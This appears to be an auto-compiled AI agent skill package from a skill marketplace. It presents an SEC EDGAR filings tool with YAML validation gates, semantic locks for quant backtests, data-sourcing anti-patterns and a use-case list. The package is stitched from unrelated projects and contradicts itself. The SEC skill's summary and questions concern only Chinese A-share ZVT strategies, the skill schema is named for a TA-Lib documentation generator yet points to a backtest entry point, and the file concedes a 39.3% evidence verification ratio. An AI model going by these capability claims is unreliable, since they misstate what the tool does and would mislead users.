      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-109 / TA-Lib Documentation HTML Generator
    version: v5.3
    intent_keywords:
    - documentation generation
    - html pages
    - pygments stylesheet
    - markdown to html
    - code highlighting
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: no candidate field had 2-7 distinct values; all capabilities collapsed into single group
      groups:
      - group_id: all
        name: All Capabilities
        description: ''
        emoji: 📦
        uc_count: 1
        ucs:
        - uc_id: UC-101
          name: TA-Lib Documentation HTML Generator
          short_description: 'Converts TA-Lib markdown documentation into styled HTML pages for web publishing, and generates
            Pygments syntax highlighting CSS for code examples in '
          sample_triggers:
          - documentation generation
          - html pages
          - pygments stylesheet
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-101
      beginner_prompt: Try ta-lib documentation html generator
      auto_selected: true
    - uc_id: UC-100
      beginner_prompt: Try capability UC-100
      auto_selected: true
    - uc_id: UC-101
      beginner_prompt: Try capability UC-101
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 1 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - TA-Lib Documentation HTML Generator
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
    - Institutional fund holdings tracker via joinquant_fund_runner pattern
    - Custom Transformer + Accumulator factor with per-entity rolling state
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Sec Edgar Tools

Skill

从 SEC EDGAR 系统获取和解析公司监管文件，支持 SEC 文件检索、财务报表（10-K/10-Q）提取、内部人交易（Form 4）追踪及机构持仓（13F）分析。。

---
name: sec-edgar-tools
description: |-
  从 SEC EDGAR 系统获取和解析公司监管文件，支持 SEC 文件检索、财务报表（10-K/10-Q）提取、内部人交易（Form 4）追踪及机构持仓（13F）分析。。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-070"
  compiled_at: "2026-04-22T13:00:24.449859+00:00"
  capability_markets: "multi-market"
  capability_activities: "data-sourcing"
  sop_version: "crystal-compilation-v6.1"
---
# SEC EDGAR 工具 (sec-edgar-tools)

> 从 SEC EDGAR 系统获取和解析公司监管文件，支持 SEC 文件检索、财务报表（10-K/10-Q）提取、内部人交易（Form 4）追踪及机构持仓（13F）分析。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (55 total)

### SEC Filing Discovery and Company Lookup (`UC-101`)
Discovering and retrieving SEC filings for companies to understand their regulatory submissions, corporate actions, and financial disclosures
**Triggers**: sec filings, company lookup, edgar search

### Company Financials Retrieval (`UC-102`)
Extracting financial data from SEC filings to analyze company performance, including income statements, balance sheets, and cash flows
**Triggers**: financials, income statement, balance sheet

### Insider Transaction Tracking (Form 4) (`UC-103`)
Tracking insider buying and selling activities by processing Form 4 filings to identify significant insider transactions and ownership changes
**Triggers**: insider trading, form 4, insider transactions

For all **55** use cases, see [references/USE_CASES.md](references/USE_CASES.md).

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (14 total)

- **`AP-DATA-SOURCING-001`**: Missing or invalid User-Agent headers for SEC API requests
- **`AP-DATA-SOURCING-002`**: Ignoring external API rate limits causing IP blocking
- **`AP-DATA-SOURCING-003`**: No HTTP timeout configuration causing indefinite hangs

All 14 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-070. Evidence verify ratio = 39.3% and audit fail total = 36. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 14 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-070` blueprint at 2026-04-22T13:00:24.449859+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Insider Transaction Tracking (Form 4)', 'Company Financials Retrieval', 'SEC Filing Discovery and Company Lookup', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **14**

## finance-bp-070--edgartools (2)

### `AP-DATA-SOURCING-004` — Invalidating XBRL period types for balance sheet analysis <sub>(high)</sub>

Balance sheets represent point-in-time snapshots (instant periods), not ranges (duration periods). Using duration periods for balance sheet statements causes stockholder equity and other line items to show nonsensical date ranges, corrupting financial calculations that depend on accurate period associations.

### `AP-DATA-SOURCING-012` — Large document parsing without streaming causing OOM errors <sub>(high)</sub>

SEC filings can exceed 160MB, and parsing large documents in memory without streaming causes OOM errors that crash the entire service for all users. Documents exceeding 10MB require switching to streaming parsers to prevent extreme memory usage.

## finance-bp-070--edgartools, finance-bp-079--akshare, finance-bp-084--eastmoney, finance-bp-114--edgar-crawler (1)

### `AP-DATA-SOURCING-002` — Ignoring external API rate limits causing IP blocking <sub>(high)</sub>

Multiple financial data sources (SEC EDGAR, Sina, Eastmoney, TuShare) enforce strict rate limits (10 req/sec, 120 calls/minute). Exceeding these triggers temporary IP blocks lasting 10-60 minutes, causing complete data unavailability. Immediate retry attempts during blocks extend the block duration significantly.

## finance-bp-070--edgartools, finance-bp-114--edgar-crawler (1)

### `AP-DATA-SOURCING-001` — Missing or invalid User-Agent headers for SEC API requests <sub>(high)</sub>

SEC EDGAR requires valid User-Agent identity with contact information in headers. Without this, requests are rejected with 403 Forbidden errors, completely blocking all filing access. Both edgartools and edgar-crawler enforce this constraint as fundamental to any data retrieval operation.

## finance-bp-079--akshare (4)

### `AP-DATA-SOURCING-003` — No HTTP timeout configuration causing indefinite hangs <sub>(high)</sub>

HTTP requests to external financial data sources (Yahoo, Sina, Eastmoney) without timeout values can hang indefinitely on blocked connections. This freezes the entire application and prevents data collection from all other sources, creating cascading failures across the system.

### `AP-DATA-SOURCING-005` — Malformed or empty JSON responses causing silent failures <sub>(medium)</sub>

Financial API responses containing malformed JSON raise unhandled ValueError exceptions, crashing downstream processing. Similarly, empty JSON responses (empty dict, list, null) masquerading as valid data cause silent failures producing empty DataFrames or misleading results in financial analysis.

### `AP-DATA-SOURCING-006` — Source-specific symbol mapping errors causing data corruption <sub>(high)</sub>

Stock symbols require source-specific formatting (sh/sz prefixes for Sina, numeric codes for THS, etc.). Incorrect symbol mapping causes API calls to return empty results or wrong data, corrupting financial datasets with missing records or entirely incorrect tickers being stored.

### `AP-DATA-SOURCING-013` — Column mapping length mismatch causing DataFrame errors <sub>(medium)</sub>

Column mapping constants with length mismatch against actual API response columns cause ValueError exceptions during DataFrame construction. Raw field names (f1, f2, f12) must be mapped to meaningful names (最新价, 涨跌幅) with exact column count alignment.

## finance-bp-103--ArcticDB (3)

### `AP-DATA-SOURCING-007` — Using unsupported DataFrame types with time-series storage <sub>(high)</sub>

ArcticDB does not support MultiIndex columns, PyArrow-backed pandas DataFrames, or timedelta64 columns. Attempting to write these DataFrame types raises ArcticDbNotYetImplemented exceptions, causing write failures and permanent data loss if not properly handled before storage operations.

### `AP-DATA-SOURCING-008` — Non-atomic storage writes causing concurrent access corruption <sub>(high)</sub>

Storage backends without atomic write_if_none operations can cause data corruption under concurrent multi-writer access. Similarly, updating reference keys before atom keys complete allows readers to access incomplete or missing data, breaking version chain integrity.

### `AP-DATA-SOURCING-014` — Pruning snapshot-protected versions breaking point-in-time recovery <sub>(high)</sub>

Deleting or pruning versions that are referenced by existing snapshots breaks historical data access. Snapshots provide point-in-time recovery capabilities, and removing their referenced versions causes read failures when users attempt to access data from specific snapshots.

## finance-bp-114--edgar-crawler (1)

### `AP-DATA-SOURCING-010` — 8-K filing item numbering scheme mismatch for historical filings <sub>(medium)</sub>

8-K filings use obsolete item numbering (1-12) before 2004-08-23 and new numbering (1.01-9.01) after. Using the wrong numbering scheme causes no matches for historical filings, resulting in empty item sections and complete extraction failure for pre-2004 data.

## finance-bp-128--yfinance (2)

### `AP-DATA-SOURCING-009` — Missing timezone-aware DatetimeIndex causing DST offset errors <sub>(high)</sub>

Price history DataFrames returned without timezone-aware DatetimeIndex cause incorrect timestamp interpretation when combined with other timezone-aware data. This leads to 23-25 hour offset errors during daylight saving time transitions, corrupting historical price calculations.

### `AP-DATA-SOURCING-011` — Yahoo Finance missing crumb authentication causing 401/403 errors <sub>(high)</sub>

Yahoo Finance API requires crumb and cookie authentication with every request. Without proper crumb management, API calls return 401 Unauthorized or HTML error pages instead of JSON data, breaking all downstream price and financial data processing.

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-070--edgartools
**Scan date**: 2026-04-22
**Stats**: {'total_files': 10, 'total_classes': 45, 'total_functions': 0, 'total_stages': 10}

## Modules (10)

- [sec_edgar_data_retrieval](components/sec_edgar_data_retrieval.md): 5 classes
- [html_document_parsing](components/html_document_parsing.md): 5 classes
- [xbrl_financial_data_processing](components/xbrl_financial_data_processing.md): 6 classes
- [multi-period_statement_stitching](components/multi-period_statement_stitching.md): 4 classes
- [entity_resolution_and_company_data](components/entity_resolution_and_company_data.md): 4 classes
- [ownership_and_insider_transaction_reporting](components/ownership_and_insider_transaction_reporting.md): 4 classes
- [ai_integration_layer](components/ai_integration_layer.md): 6 classes
- [asset-backed_securities_data](components/asset-backed_securities_data.md): 3 classes
- [financial_statement_rendering](components/financial_statement_rendering.md): 5 classes
- [filing_search_and_discovery](components/filing_search_and_discovery.md): 3 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 145
  fatal_constraints_count: 46
  non_fatal_constraints_count: 303
  use_cases_count: 55
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

## Domain Constraints Injected (16)

- **`SHARED-DS-RL-001`** <sub>(fatal)</sub>: Rate Limit + 指数退避重试：所有外部数据 API 调用必须实施速率限制控制 和指数退避重试（Exponential Backoff with Jitter）。收到 429/503 响应后 立即重试是反模式，会加剧服务端压力并触发 IP 封禁。 最大重试次数 3-5 次，退避基数 1-2 秒，最大退避 60 秒。
- **`SHARED-DS-RL-002`** <sub>(high)</sub>: 批量 API 调用必须控制并发数（max_workers），不可无限制并行。 免费 API（akshare/tushare 免费版）通常限制为 1-3 并发； 付费 API 也有并发上限（tushare 积分制，不同积分对应不同并发）。 超出并发限制会触发 429 或 IP 封禁。推荐使用 asyncio.Semaphore 或 ThreadPoolExecutor 的 max_workers 参数显式控制。
- **`SHARED-DS-RL-003`** <sub>(high)</sub>: API Token / 凭证安全：数据源 API key（tushare token / akshare 无需 token 但 其他商业数据源需要）不可硬编码在代码中，必须通过环境变量或配置文件读取。 硬编码 token 提交到 Git 会导致 token 泄露和费用损失。
- **`SHARED-DS-RL-004`** <sub>(medium)</sub>: 请求节流（Throttling）：对同一 API 的批量请求应在请求间插入最小间隔 （akshare 部分接口要求 ≥ 0.5s；tushare 免费版每分钟 200 次）。 纯代码 sleep 不如令牌桶（Token Bucket）算法精确，推荐使用 ratelimit 或 slowapi 等成熟库。
- **`SHARED-DS-MISS-001`** <sub>(high)</sub>: 停牌日数据缺失策略：停牌股票在停牌期间无成交数据，数据库中会出现日期缺口。 缺失日期不可使用 forward-fill（会产生虚假成交量）； 应在数据库中以 is_suspended=True 标记，量和成交额填 0，价格保留前一日收盘价。 因子计算时必须过滤 is_suspended=True 的行。
- **`SHARED-DS-MISS-002`** <sub>(medium)</sub>: 新上市股票的历史数据边界：新股上市首日开始在数据库中出现，但其上市前 无历史数据。若因子计算的 lookback 期超过上市天数，会产生所有 NaN 因子值。 采集时应记录每只股票的上市日期（list_date），采集逻辑应以上市日期为起点， 不以固定开始日期。
- **`SHARED-DS-MISS-003`** <sub>(high)</sub>: 退市股票的数据完整性：已退市股票在主流数据源（akshare/tushare）中依然 可以查询历史数据（退市前的历史），但退市日期后无数据。 历史股票池构建时必须包含已退市股票（否则幸存者偏差）， 且采集时需明确处理退市日截止边界。
- **`SHARED-DS-MISS-004`** <sub>(high)</sub>: 多数据源数据对账（Cross-Source Reconciliation）：同一数据（如收盘价） 从不同数据源（akshare/tushare/baostock）获取可能存在细微差异 （不同复权方式/不同节假日处理/除息调整时间不同）。 应在 pipeline 中实施多源对账检查，差异超阈值（如 0.1%）时记录告警并人工确认。
- **`SHARED-DS-TIME-001`** <sub>(high)</sub>: 时间戳精度与类型一致性：数据库中时间戳应使用统一的数据类型 （timestamp 而非 varchar/int）。混用字符串日期（'2024-01-15'）和 Timestamp 对象是比较、索引、merge 出现细微 bug 的常见来源， 应在 pipeline 入口处强制转换。
- **`SHARED-DS-TIME-002`** <sub>(high)</sub>: 交易时间与自然时间的区分：日线数据的"日期"通常对应交易日（T日）， 而新闻/公告数据的"时间"是自然时间。合并两类数据时，必须将自然时间 映射到下一个可用交易日（next available trading day）， 否则会产生"公告在T日，但T日盘中已经可用"的 lookahead 问题。
- **`SHARED-DS-TIME-003`** <sub>(medium)</sub>: 夏令时（DST）处理：采集美股/欧洲股市数据时，夏令时切换日（3月/11月） 会导致同一 HH:MM 时刻对应不同的 UTC 时间，若未处理，当日时序数据 会出现1小时的漂移。应始终以 UTC 存储，展示时按市场本地时区转换。
- **`SHARED-DS-INCR-001`** <sub>(high)</sub>: 增量更新幂等性：数据更新脚本必须是幂等的（多次运行结果相同）。 若脚本因网络中断在中途失败，重新运行时不应产生重复数据或数据缺口。 实现方式：先写入临时表，校验后 UPSERT 到主表，不直接 INSERT/APPEND。
- **`SHARED-DS-INCR-002`** <sub>(high)</sub>: 数据完整性检验（数据校验和/行数检查）：每次数据更新后， 应对关键字段做完整性检验：行数是否在预期范围内、价格是否为正数、 日期是否连续（无缺失交易日）。缺少自动校验的数据管道是"沉默腐烂"的根源。
- **`SHARED-DS-INCR-003`** <sub>(medium)</sub>: 数据版本化：数据管道的输出数据应版本化管理（data versioning）。 当数据源更新了历史数据（如修订调整后的财务数据）， 旧版本数据应保留可追溯，不应静默覆盖，以便对比版本间差异及复现历史回测。
- **`SHARED-DS-INCR-004`** <sub>(medium)</sub>: 数据对齐到交易日历边界：采集完成后，应验证所有股票/资产的数据覆盖 完整性与交易日历的一致性。每只股票在每个交易日都应有一行数据 （停牌标记，不是缺失）。通过 pivot_table 检查 NaN 比例是有效的快速诊断手段。
- **`SHARED-DS-INCR-005`** <sub>(medium)</sub>: 缓存策略（Caching）：频繁读取的静态/低频更新数据（如股票信息、行业分类、 指数成分股）应本地缓存，避免每次运行重复 API 调用。 缓存必须设置过期时间（TTL），防止使用过期的行业分类或已失效的成分股信息。

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **55**

## `KUC-101`
**Source**: `docs/Usage.ipynb`

Discovering and retrieving SEC filings for companies to understand their regulatory submissions, corporate actions, and financial disclosures.

## `KUC-102`
**Source**: `docs/doctest.py`

Extracting financial data from SEC filings to analyze company performance, including income statements, balance sheets, and cash flows.

## `KUC-103`
**Source**: `docs/examples/insider_transactions.py`

Tracking insider buying and selling activities by processing Form 4 filings to identify significant insider transactions and ownership changes.

## `KUC-104`
**Source**: `notebooks/13f-institutional-holdings-python.ipynb`

Analyzing institutional investment holdings from 13F filings to understand portfolio composition, top holdings, and changes in positions over time.

## `KUC-105`
**Source**: `docs/examples/crowdfunding.py`

Tracking Regulation CF crowdfunding campaigns through their complete lifecycle including initial filings, amendments, updates, and termination.

## `KUC-106`
**Source**: `notebooks/Reading-Data-From-XBRL.ipynb`

Extracting structured financial data from XBRL-tagged filings including income statements, balance sheets, and cash flow statements with period history.

## `KUC-107`
**Source**: `notebooks/10k-business-description-python.ipynb`

Extracting and analyzing sections from 10-K annual reports including business descriptions, risk factors, and MD&A for fundamental analysis.

## `KUC-108`
**Source**: `notebooks/8k-earnings-release-python.ipynb`

Finding and extracting earnings information from 8-K current reports including press releases, financial tables, and earnings-related disclosures.

## `KUC-109`
**Source**: `notebooks/etf-fund-holdings-python.ipynb`

Analyzing ETF portfolio holdings from NPORT-P filings to understand fund composition, top positions, and allocation by sector or country.

## `KUC-110`
**Source**: `notebooks/executive-compensation-sec-python.ipynb`

Analyzing executive compensation from DEF 14A proxy statements including CEO pay, pay-vs-performance metrics, and compensation trends.

## `KUC-111`
**Source**: `notebooks/10q-quarterly-earnings-python.ipynb`

Comparing quarterly financial results across companies or tracking a single company's quarterly performance over multiple periods.

## `KUC-112`
**Source**: `notebooks/compare-company-financials-python.ipynb`

Comparing financial metrics across multiple companies to benchmark performance, profitability, and growth metrics.

## `KUC-113`
**Source**: `notebooks/monitor-sec-filings-python.ipynb`

Monitoring today's SEC filings to track earnings announcements, insider trading, and other corporate events as they happen.

## `KUC-114`
**Source**: `notebooks/download-sec-filings-bulk-python.ipynb`

Downloading large batches of SEC filings for archival, analysis, or processing with support for multiple output formats (text, markdown, HTML).

## `KUC-115`
**Source**: `notebooks/sec-filing-text-nlp-python.ipynb`

Applying NLP techniques to SEC filings including text extraction, search, section identification, and document chunking for analysis.

## `KUC-116`
**Source**: `notebooks/sec-industry-sic-code-python.ipynb`

Filtering companies and filings by SIC codes and industry classifications to focus research on specific sectors like semiconductors, software, or banking.

## `KUC-117`
**Source**: `notebooks/beneficial-ownership-sec-python.ipynb`

Tracking beneficial ownership changes through Schedule 13D and 13G filings to identify significant shareholders and ownership stakes.

## `KUC-118`
**Source**: `notebooks/money-market-fund-nmfp-python.ipynb`

Analyzing money market fund portfolios from N-MFP filings including holdings, maturity schedules, yield history, and fund composition.

## `KUC-119`
**Source**: `notebooks/mutual-fund-holdings-nport-python.ipynb`

Extracting mutual fund portfolio holdings from NPORT-P filings to analyze fund composition, country allocation, and sector exposure.

## `KUC-120`
**Source**: `notebooks/bdc-business-development-company-python.ipynb`

Researching BDCs including portfolio companies, investment strategies, and financial performance for alternative investment analysis.

## `KUC-121`
**Source**: `notebooks/XBRL2-StitchingStatements.ipynb`

Combining XBRL financial statements across multiple filings or periods to create unified views of financial performance over time.

## `KUC-122`
